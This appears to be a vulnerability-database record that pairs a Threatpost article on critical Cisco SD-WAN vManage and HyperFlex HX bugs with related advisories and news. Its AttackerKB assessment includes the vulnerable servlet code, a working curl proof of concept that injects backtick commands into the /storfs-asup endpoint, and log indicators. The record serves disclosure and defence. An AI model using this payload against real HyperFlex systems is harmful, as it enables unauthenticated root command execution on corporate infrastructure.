ID THREATPOST:A0118F22F5F180B787B4D704CFE1B8DF Type threatpost Reporter Tara Seals Modified 2021-05-06T17:54:33
Description
Cisco has addressed two critical security vulnerabilities in the SD-WAN vManage Software, one of which could allow an unauthenticated attacker to carry out remote code execution (RCE) on corporate networks or steal information.
The networking giant also disclosed a denial-of-service issue in vManage; and locally exploitable bugs that would allow an authenticated attacker to escalate privileges or gain unauthorized access to applications.
Separately, Cisco patched two vulnerabilities in the Cisco HyperFlex HX platform, one of them rated critical.
Critical vManage Security Bugs
vManage is a centralized network management system that provides a GUI interface to easily monitor, configure and maintain all devices and links in the overlay SD-WAN. According to Cisco’s Wednesday advisory, there are five security holes in the software, the first four only exploitable if the platform is running in cluster mode:
The issue tracked as CVE-2021-1468 is the most severe of the five, carrying a CVSS vulnerability-severity score of 9.8 out of 10. It exists in messaging service used by vManage, and is due to improper authentication checks on user-supplied input to an application messaging service, according to Cisco.
Unauthenticated, remote adversaries could mount a cyberattack by submitting crafted input to the service. That would allow them to call privileged actions within the affected system, including creating new administrative level user accounts, the advisory said.
Meanwhile, the local privilege-escalation (LPE) bug tracked as CVE-2021-1505 has a CVSS score of 9.1. It exists in the web-based management interface of vManage and would allow an authenticated, remote attacker to bypass authorization checking to gain elevated privileges within the system.
Similarly, CVE-2021-1508, which has a CVSS score of 8.1, is an LPE bug that can also be found in the web-based management interface. It would also allow an authenticated, remote attacker to bypass authorization checking in order to gain access to forbidden applications, make application modifications and also gain elevated privileges.
Both local bugs exist “because the affected software does not perform authorization checks on certain operations,” according to Cisco.
A third locally exploitable bug, CVE-2021-1506, carries a CVSS score of 7.2. It allows an authenticated, remote attacker to gain unauthorized access to services within an affected system, because the system doesn’t perform authorization checks on service access.
And in all three local cases, an attacker could trigger exploits by sending crafted requests to the affected system.
And finally, the CVE-2021-1275 DoS flaw (CVSS score 7.5) exists in a vManage API. Attackers can send a large amount of API requests to a target system to tie it up and prevent it from functioning properly.
“The vulnerability is due to insufficient handling of API requests to the affected system,” according to Cisco.
Cisco HyperFlex HX Command-Injection Bugs
The HyperFlex HX software is used to manage hybrid IT environments by converging the oversight of the various applications that enterprises house within data centers – across both traditional and cloud-native/containerized applications.
Cisco said Wednesday that multiple vulnerabilities in the platform’s web-based management interface could allow an unauthenticated, remote attacker to perform command-injection attacks against an affected device.
Cisco has patched two security bugs in HyperFlex HX in total:
CVE-2021-1498: High-Severity Data Platform Command-Injection Vulnerability
The first is a critical flaw with a 9.8 CVSS rating,
“This vulnerability is due to insufficient validation of user-supplied input,” according to Cisco. “A successful exploit could allow the attacker to execute arbitrary commands on an affected device as the root user.”
The second bug rates 7.2 on the CVSS scale, and is due to insufficient validation of user-supplied input, according to Cisco, which added, “A successful exploit could allow the attacker to execute arbitrary commands on an affected device as the tomcat8 user.”
Both flaws can be exploited by sending a crafted request to the web-based management interface.
These are just the latest bugs addressed by the tech behemoth this year. In February, Cisco addressed a critical vulnerability in its intersite policy manager software for the Nexus 3000 Series switches and Nexus 9000 Series switches that could allow a remote attacker to bypass authentication. And in January, it killed a high-severity flaw in its smart Wi-Fi solution for retailers that could allow a remote attacker to alter the password of any account user on affected systems.
{"id": "THREATPOST:A0118F22F5F180B787B4D704CFE1B8DF", "type": "threatpost", "bulletinFamily": "info", "title": "Critical Cisco SD-WAN, HyperFlex Bugs Menace Networks", "description": "Cisco has addressed two critical security vulnerabilities in the SD-WAN vManage Software, one of which could allow an unauthenticated attacker to carry out remote code execution (RCE) on corporate networks or steal information.\n\nThe networking giant also disclosed a denial-of-service issue in vManage; and locally exploitable bugs that would allow an authenticated attacker to escalate privileges or gain unauthorized access to applications.\n\nSeparately, Cisco patched two vulnerabilities in the Cisco HyperFlex HX platform, one of them rated critical.\n\n## **Critical vManage Security Bugs**\n\nvManage is a centralized network management system that provides a GUI interface to easily monitor, configure and maintain all devices and links in the overlay SD-WAN. According to Cisco\u2019s [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ>), there are five security holes in the software, the first four only exploitable if the platform is running in cluster mode:\n\n * CVE-2021-1468: Critical Unauthorized Message-Processing Vulnerability (RCE)\n * CVE-2021-1505: Critical Privilege-Escalation Vulnerability\n * CVE-2021-1508: High-Severity Unauthorized-Access Vulnerability\n * CVE-2021-1506: High-Severity Unauthorized Services-Access Vulnerability\n * CVE-2021-1275: High-Severity Denial-of-Service Vulnerability\n\nThe issue tracked as CVE-2021-1468 is the most severe of the five, carrying a CVSS vulnerability-severity score of 9.8 out of 10. It exists in messaging service used by vManage, and is due to improper authentication checks on user-supplied input to an application messaging service, according to Cisco.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nUnauthenticated, remote adversaries could mount a cyberattack by submitting crafted input to the service. That would allow them to call privileged actions within the affected system, including creating new administrative level user accounts, the advisory said.\n\nMeanwhile, the local privilege-escalation (LPE) bug tracked as CVE-2021-1505 has a CVSS score of 9.1. It exists in the web-based management interface of vManage and would allow an authenticated, remote attacker to bypass authorization checking to gain elevated privileges within the system.\n\nSimilarly, CVE-2021-1508, which has a CVSS score of 8.1, is an LPE bug that can also be found in the web-based management interface. It would also allow an authenticated, remote attacker to bypass authorization checking in order to gain access to forbidden applications, make application modifications and also gain elevated privileges.\n\nBoth local bugs exist \u201cbecause the affected software does not perform authorization checks on certain operations,\u201d according to Cisco.\n\nA third locally exploitable bug, CVE-2021-1506, carries a CVSS score of 7.2. It allows an authenticated, remote attacker to gain unauthorized access to services within an affected system, because the system doesn\u2019t perform authorization checks on service access.\n\nAnd in all three local cases, an attacker could trigger exploits by sending crafted requests to the affected system.\n\nAnd finally, the CVE-2021-1275 DoS flaw (CVSS score 7.5) exists in a vManage API. Attackers can send a large amount of API requests to a target system to tie it up and prevent it from functioning properly.\n\n\u201cThe vulnerability is due to insufficient handling of API requests to the affected system,\u201d according to Cisco.\n\n## **Cisco HyperFlex HX Command-Injection Bugs**\n\nThe HyperFlex HX software is used to manage hybrid IT environments by converging the oversight of the various applications that enterprises house within data centers \u2013 across both traditional and cloud-native/containerized applications.\n\nCisco [said Wednesday](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR>) that multiple vulnerabilities in the platform\u2019s web-based management interface could allow an unauthenticated, remote attacker to perform command-injection attacks against an affected device.\n\nCisco has patched two security bugs in HyperFlex HX in total:\n\n * CVE-2021-1497: Critical Installer Virtual Machine Command-Injection Vulnerability\n * CVE-2021-1498: High-Severity Data Platform Command-Injection Vulnerability\n\nThe first is a critical flaw with a 9.8 CVSS rating,\n\n\u201cThis vulnerability is due to insufficient validation of user-supplied input,\u201d according to Cisco. \u201cA successful exploit could allow the attacker to execute arbitrary commands on an affected device as the root user.\u201d\n\nThe second bug rates 7.2 on the CVSS scale, and is due to insufficient validation of user-supplied input, according to Cisco, which added, \u201cA successful exploit could allow the attacker to execute arbitrary commands on an affected device as the tomcat8 user.\u201d\n\nBoth flaws can be exploited by sending a crafted request to the web-based management interface.\n\nThese are just the latest bugs addressed by the tech behemoth this year. In February, Cisco [addressed a critical vulnerability](<https://threatpost.com/cisco-critical-security-flaw/164255/>) in its intersite policy manager software for the Nexus 3000 Series switches and Nexus 9000 Series switches that could allow a remote attacker to bypass authentication. And in January, it [killed a high-severity flaw](<https://threatpost.com/cisco-flaw-cmx-software-retailers/163027/>) in its smart Wi-Fi solution for retailers that could allow a remote attacker to alter the password of any account user on affected systems.\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "published": "2021-05-06T17:54:33", "modified": "2021-05-06T17:54:33", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://threatpost.com/critical-cisco-sd-wan-hyperflex-bugs/165923/", "reporter": "Tara Seals", "references": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ", "https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar", "https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR", "https://threatpost.com/cisco-critical-security-flaw/164255/", "https://threatpost.com/cisco-flaw-cmx-software-retailers/163027/", "https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar", "https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar", "https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar"], "cvelist": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508"], "immutableFields": [], "lastseen": "2021-05-07T18:46:24", "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "thn", "idList": ["THN:E5C91FC48CC9CB51116164A4422D17F8"]}, {"type": "attackerkb", "idList": ["AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244"]}, {"type": "cisco", "idList": ["CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR"]}, {"type": "nessus", "idList": ["CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ.NASL", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR.NASL"]}, {"type": "cve", "idList": ["CVE-2021-1275", "CVE-2021-1508", "CVE-2021-1498", "CVE-2021-1468", "CVE-2021-1505", "CVE-2021-1497", "CVE-2021-1506"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162976"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:23D7FEEF87EC80463CD4EDB1EA568128"]}, {"type": "threatpost", "idList": ["THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:5E0F10B7C7F455D20C9D20D224B4BD55"]}], "modified": "2021-05-07T18:46:24", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-05-07T18:46:24", "rev": 2}, "vulnersScore": 7.1}}
{"attackerkb": [{"lastseen": "2021-06-04T18:17:26", "bulletinFamily": "info", "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 18, 2021 12:18am UTC reported:\n\n# CVE-2021-1497/CVE-2021-1498\n\nCommand injection in the `/storfs-asup` endpoint\u2019s `token` and `mode` parameters.\n\n## Patch\n \n \n --- unpatched/web.xml\t2021-05-17 19:06:17.000000000 -0500\n +++ patched/web.xml\t2021-05-17 19:06:23.000000000 -0500\n @@ -69,17 +69,6 @@\n \t</servlet-mapping>\n \n \t<servlet>\n -\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n -\t\t<servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>\n -\t\t<load-on-startup>1</load-on-startup>\n -\t</servlet>\n -\n -\t<servlet-mapping>\n -\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n -\t\t<url-pattern>/storfs-asup/*</url-pattern>\n -\t</servlet-mapping>\n -\n -\t<servlet>\n \t\t<servlet-name>Springpath Upgrade Image Upload Service</servlet-name>\n \t\t<servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>\n \t</servlet>\n \n\n## Vulnerability\n \n \n protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n String action = request.getParameter(\"action\");\n if (action == null) {\n String msg = \"Action for the servlet need be specified.\";\n writeErrorResponse(response, msg);\n return;\n }\n try {\n String token = request.getParameter(\"token\");\n StringBuilder cmd = new StringBuilder();\n cmd.append(\"exec /bin/storfs-asup \");\n cmd.append(token);\n String mode = request.getParameter(\"mode\");\n cmd.append(\" \");\n cmd.append(mode);\n cmd.append(\" > /dev/null\");\n logger.info(\"storfs-asup cmd to run : \" + cmd);\n ProcessBuilder pb = new ProcessBuilder(new String[] { \"/bin/bash\", \"-c\", cmd.toString() });\n logger.info(\"Starting the storfs-asup now: \");\n long startTime = System.currentTimeMillis();\n Process p = pb.start();\n InputStream errStream = p.getErrorStream();\n String errMsg = FileUtils.readToString(errStream);\n int exitCode = p.waitFor();\n long timeTaken = System.currentTimeMillis() - startTime;\n logger.info(\"storfs-asup command completed in (\" + timeTaken + \" ) milliseconds, with exit code (\" + exitCode + \") and error message: \" + errMsg);\n errStream.close();\n OutputStream outStream = p.getOutputStream();\n outStream.flush();\n outStream.close();\n if (exitCode != 0)\n throw new Exception(errMsg);\n } catch (IOException ex) {\n logger.error(\"Failed to generate asup: \" + ex);\n } catch (Exception ie) {\n logger.error(\"Failed to run the /bin/storfs-asup command.\");\n } finally {\n logger.info(\"Done executing asup command. \");\n }\n }\n \n \n \n tomcat7@HyperFlex-Installer-4:~$ sudo -l\n Matching Defaults entries for tomcat7 on HyperFlex-Installer-4:\n !lecture, tty_tickets, !fqdn\n \n User tomcat7 may run the following commands on HyperFlex-Installer-4:\n (ALL) NOPASSWD: /opt/springpath/storfs-support/support.py\n (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_asup.sh\n (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_sch.sh\n tomcat7@HyperFlex-Installer-4:~$ sudo /opt/springpath/storfs-support/support.py --help\n Usage: support.py [options]\n \n Options:\n -h, --help show this help message and exit\n -t TARGET, --target=TARGET\n Target directory where the support bundle should go\n (XXX: This could be a remote host(dir), ex:\n hostname:/foo). Optional. Default = /tmp\n -i INSTALLDIR, --installdir=INSTALLDIR\n Install directory for storfs. Optional.\n -k ZKDIR, --zkdir=ZKDIR\n zookeeper directory for storfs. Optional\n -l LOGDIR, --logdir=LOGDIR\n log directory for storfs. Optional\n --asupdir=ASUPDIR asup directory for storfs. Optional\n -c COREDIR, --coredir=COREDIR\n core directory for storfs. Optional\n -m MANIFESTDIR, --manifestdir=MANIFESTDIR\n Manifest directory for storfs support. All files with\n .mfx extension in this directory will be processed.\n Optional\n --list List the manifests. Optional\n -f MANIFESTFILES, --manifest-file=MANIFESTFILES\n Manifest file to use for generating support. Multiple\n manifest files can be specified. Manifests files are\n required to have .mfx suffix. Optional (Cannot be with\n -m option)\n -e TOOLSEXEDIR, --toolsexedir=TOOLSEXEDIR\n log directory for storfs binary files. Optional\n --hypervdir=HYPERVDIR\n log directory for hyperv binary files. Optional\n -o TOOLSDIR, --toolsdir=TOOLSDIR\n Path for storfs tools. Optional\n -r RUNTIMEDIR, --runtimedir=RUNTIMEDIR\n Path for runtime dir (which contains\n storfs_running_process.pid files). Optional\n -b BUILDTYPE, --buildtype=BUILDTYPE\n Build type that was running. Optional. Default = debug\n -a ADDITIONAL_FILES, --additional-files=ADDITIONAL_FILES\n any additional files/directories (not in manifest)\n that should be added to the support bundle. Optional.\n --dry-run Process manifests to make sure that there are no\n errors\n tomcat7@HyperFlex-Installer-4:~$ ls /opt/springpath/storfs-support/*.mfx\n /opt/springpath/storfs-support/springpath-basic.mfx /opt/springpath/storfs-support/springpath-zookeeper-no-db.mfx\n /opt/springpath/storfs-support/springpath.mfx /opt/springpath/storfs-support/springpath-logs.mfx\n /opt/springpath/storfs-support/springpath-default-os.mfx /opt/springpath/storfs-support/springpath-extended.mfx\n /opt/springpath/storfs-support/springpath-default-asup.mfx /opt/springpath/storfs-support/deployment.mfx\n /opt/springpath/storfs-support/springpath-mgmt.mfx /opt/springpath/storfs-support/springpath-witness.mfx\n /opt/springpath/storfs-support/springpath-default-asup-cli-esx.mfx /opt/springpath/storfs-support/springpath-default-asup-hyperv.mfx\n /opt/springpath/storfs-support/springpath-zookeeper.mfx /opt/springpath/storfs-support/springpath-default-asup-esx.mfx\n /opt/springpath/storfs-support/springpath-default-event-asup.mfx /opt/springpath/storfs-support/springpath-perf.mfx\n /opt/springpath/storfs-support/springpath-default-asup-cli-hyperv.mfx /opt/springpath/storfs-support/springpath-exhaustive.mfx\n tomcat7@HyperFlex-Installer-4:~$ head /opt/springpath/storfs-support/springpath-basic.mfx\n # Springpath manifest file. Contains just basic logs.\n # Simplified from springpath-mgmt.mfx\n [\"copy\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"/var/jail/var/log/springpath\"]\n [\"copy\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"/etc/iptables_node_cluster.rules\"]\n [\"exec\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"iptables --list -n -v\"]\n [\"exec\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"bom-check.sh\"]\n [\"exec\", \"TIMEOUT=120\", \"IGNORE_ERROR\", \"mstcli cluster diag\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli cluster info\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli appliance list\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli datastore list\"]\n tomcat7@HyperFlex-Installer-4:~$\n \n\n## PoC\n \n \n wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'\n * Trying 192.168.123.133...\n * TCP_NODELAY set\n * Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)\n > POST /storfs-asup HTTP/1.1\n > Host: 192.168.123.133\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Length: 28\n > Content-Type: application/x-www-form-urlencoded\n >\n * upload completely sent off: 28 out of 28 bytes\n < HTTP/1.1 200 OK\n < Server: nginx/1.8.1\n < Date: Tue, 18 May 2021 00:54:26 GMT\n < Content-Length: 0\n < Connection: keep-alive\n < Front-End-Https: on\n <\n * Connection #0 to host 192.168.123.133 left intact\n * Closing connection 0\n wvu@kharak:~$\n \n\n## IOCs\n \n \n ==> /var/log/nginx/access.log <==\n 192.168.123.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.1\" 200 0 \"-\" \"curl/7.64.1\"\n \n ==> /var/log/springpath/stBootstrapGuiBackend.log <==\n 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now:\n 2021-05-18-00:54:26.017 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n 2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command.\n 2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command.\n \n ==> /var/log/tomcat7/catalina.out <==\n 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now:\n 2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n 2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command.\n 2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command.\n \n ==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <==\n 127.0.0.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.0\" 200 -\n \n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 5\n", "modified": "2021-05-15T00:00:00", "id": "AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "href": "https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497", "published": "2021-05-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-1497", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-04T18:17:27", "bulletinFamily": "info", "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 18, 2021 12:23am UTC reported:\n\nSee [CVE-2021-1497](<https://attackerkb.com/assessments/4f532147-b27b-4079-aed1-5cfdc402cf5c>).\n", "modified": "2021-05-18T00:00:00", "id": "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244", "href": "https://attackerkb.com/topics/V6mTqsTWkw/cve-2021-1498", "published": "2021-05-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-1498", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2021-05-07T02:28:20", "bulletinFamily": "info", "cvelist": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508", "CVE-2021-21984"], "description": "[](<https://thehackernews.com/images/-50vFnI5p98k/YJPgYtKAl9I/AAAAAAAACd8/1v7GG_-Ci1Ue9y2cRLkwDJeb39bmkPtYwCLcBGAsYHQ/s0/cisco.jpg>)\n\nNetworking equipment major Cisco has rolled out software updates to address multiple critical vulnerabilities impacting HyperFlex HX and SD-WAN vManage Software that could allow an attacker to perform command injection attacks, execute arbitrary code, and gain access to sensitive information.\n\nIn a series of advisories published on May 5, the company said there are no workarounds that remediate the issues.\n\nThe HyperFlex HX command injection vulnerabilities, tracked as CVE-2021-1497 and CVE-2021-1498 (CVSS scores 9.8), affect all Cisco devices running HyperFlex HX software versions 4.0, 4.5, and those prior to 4.0. Arising due to insufficient validation of user-supplied input in the web-based management interface of Cisco HyperFlex HX Data Platform, the flaws could enable an unauthenticated, remote attacker to perform a command injection attack against a vulnerable device.\n\n[](<https://go.thn.li/1-728-4> \"password auditor\" )\n\n\"An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface,\" the company [said](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR>) in its alert. \"A successful exploit could allow the attacker to execute arbitrary commands\" either as a root or tomcat8 user.\n\nCisco also squashed [five glitches](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ>) affecting SD-WAN vManage Software (CVE-2021-1275, CVE-2021-1468, CVE-2021-1505, CVE-2021-1506, and CVE-2021-1508) that could permit an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application.\n\nNikita Abramov and Mikhail Klyuchnikov of Positive Technologies have been credited with reporting the HyperFlex HX flaws, whereas four of the SD-WAN vManage bugs were identified during internal security testing, with CVE-2021-1275 uncovered during the resolution of a Cisco Technical Assistance Center (TAC) support case.\n\nWhile there is no evidence of malicious use of the vulnerabilities in the wild, it's recommended that users upgrade to the latest version to mitigate the risk associated with the flaws.\n\n### VMware Fixes Critical vRealize Business for Cloud Bug\n\nIt's not just Cisco. VMware on Wednesday released patches to fix a [critical severity flaw](<https://www.vmware.com/security/advisories/VMSA-2021-0007.html>) in vRealize Business for Cloud 7.6 that enables unauthenticated attackers to execute malicious code on vulnerable servers remotely.\n\nThe remote code execution flaw (CVE-2021-21984, CVSS score: 9.8) stems from an unauthorized [VAMI endpoint](<https://docs.vmware.com/en/VMware-Adapter-for-SAP-Landscape-Management/2.0.1/Installation-and-Administration-Guide-for-VLA-Administrators/GUID-CEEB151C-8B44-47B3-8D16-CB97BB865B2F.html>), resulting in a scenario that could cause an adversary with network access to run unauthorized code on the appliance. Affected customers can rectify the issue by [installing](<https://kb.vmware.com/s/article/83475>) the security patch ISO file.\n\nVmware credited Egor Dimitrenko of Positive Technologies for reporting the vulnerability.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-05-07T01:50:39", "published": "2021-05-06T12:30:00", "id": "THN:E5C91FC48CC9CB51116164A4422D17F8", "href": "https://thehackernews.com/2021/05/critical-flaws-hit-cisco-sd-wan-vmanage.html", "type": "thn", "title": "Critical Flaws Hit Cisco SD-WAN vManage and HyperFlex Software", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisco": [{"lastseen": "2021-05-05T16:17:44", "bulletinFamily": "software", "cvelist": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508"], "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application.\n\nFor more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.\n\nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ\"]", "modified": "2021-05-05T16:00:00", "published": "2021-05-05T16:00:00", "id": "CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ", "type": "cisco", "title": "Cisco SD-WAN vManage Software Vulnerabilities", "cvss": {"score": 9.8, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}, {"lastseen": "2021-05-07T14:26:57", "bulletinFamily": "software", "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n\nFor more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.\n\nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR\"]", "modified": "2021-05-07T13:48:13", "published": "2021-05-05T16:00:00", "id": "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR", "type": "cisco", "title": "Cisco HyperFlex HX Command Injection Vulnerabilities", "cvss": {"score": 9.8, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}], "nessus": [{"lastseen": "2021-05-18T07:26:28", "description": "According to its self-reported version, Cisco SD-WAN Viptela Software is affected by multiple vulnerabilities that\nallow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an\nauthenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-05-10T00:00:00", 